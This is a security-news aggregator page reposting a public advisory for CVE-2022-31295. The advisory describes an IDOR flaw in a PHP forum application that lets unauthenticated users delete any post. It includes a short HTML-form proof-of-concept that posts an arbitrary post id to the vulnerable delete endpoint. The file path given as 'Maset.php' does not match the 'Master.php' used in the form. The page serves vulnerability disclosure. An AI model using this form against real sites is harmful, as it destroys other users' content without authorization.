Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31295: GitHub - bigzooooz/CVE-2022-31295: Online Discussion Forum Site 1.0 - IDOR / Delete any post

An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts.

CVE
Open in Source
#vulnerability#ubuntu#git#php#auth

CVE-2022-31295

Online Discussion Forum Site 1.0 - IDOR / Delete any post

Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post****Date: 2022-06-13****CVE: CVE-2022-31295****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu

[#] Vulnerability Location: function delete_post() in /odfs/classes/Maset.php:133

[#] Exploitation: <form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user"> <input type="text" name="id" value="" placeholder="enter POST ID to delete" required> <button type="submit">Delete Post</button> </form>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE